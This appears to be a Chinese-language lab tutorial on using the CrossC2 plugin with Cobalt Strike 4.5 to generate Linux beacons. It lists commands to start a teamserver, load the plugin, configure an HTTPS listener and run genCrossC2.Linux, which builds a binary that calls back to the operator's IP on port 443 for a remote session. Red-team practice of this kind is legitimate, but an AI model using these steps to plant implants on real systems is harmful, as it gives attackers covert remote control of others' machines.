CobaltStrike上线Linux

在前面的几期文章中，我们讲到了CobaltStrike的安装汉化极其使用。但是没有一个工具是十全十美的，CS也是如此。在使用过程中我们发现，cs在生成shell时只能生成windows平台下的.exe而对于mac和Linux主机则无法生成相应的shell。这严重的阻碍了我们学习的动力，那么我们该怎样解决呢？

这时，我们就需要用到第三方插件CrossC2

实验环境

• kali2022
• CS4.5
• Centos7(如果没有可用kali代替)
• 同一局域网（外网需映射）

下载和配置CrossC2

我们到CrossC2的项目地址:https://github.com/gloxec/CrossC2/releases下载这两个文件。
CrossC2-GithubBot-2022-06-07.cna genCrossC2.Linux 前者时cs的插件文件。

下载完成后，我们复制到kali中的cs目录下。

启动cobaltstrike

#启动服务端
./teamserver 192.168.50.123 123
#启动cs
./cobaltstrike

将插件CrossC2安装到cs中
依次点击cobaltstrike-脚本管理器
选择我们的插件后载入

这时候，我们的菜单栏会有CrossC2的选项。

配置https监听

Linux的shell目前只支持https，我们在cs中配置https监听。

生成Linux终端下的shell

生成的方法有两种，首先来看第一种。
我们在cs目录下运行下面命令

./genCrossC2.Linux 192.168.50.123 443 .cobaltstrike.beacon_keys null Linux x64 /tmp/test

参数说明：
/genCrossC2.Linux:就是我们在github下载的文件
.cobaltstrike.beacon_keys ：是cs的证书文件，默认在cs目录下，注意是隐藏文件用ls -a命令可查看。
192.168.50.123 443:分别为kali的IP地址和端口。

这样便在kali的tmp目录下生成了一个test文件，执行命令./test便可以得到会话。
第二种方法就是用CrossC2直接生成。

但是由于版本的多样性，这种方法并不一定会成功。建议采用第一步！

效果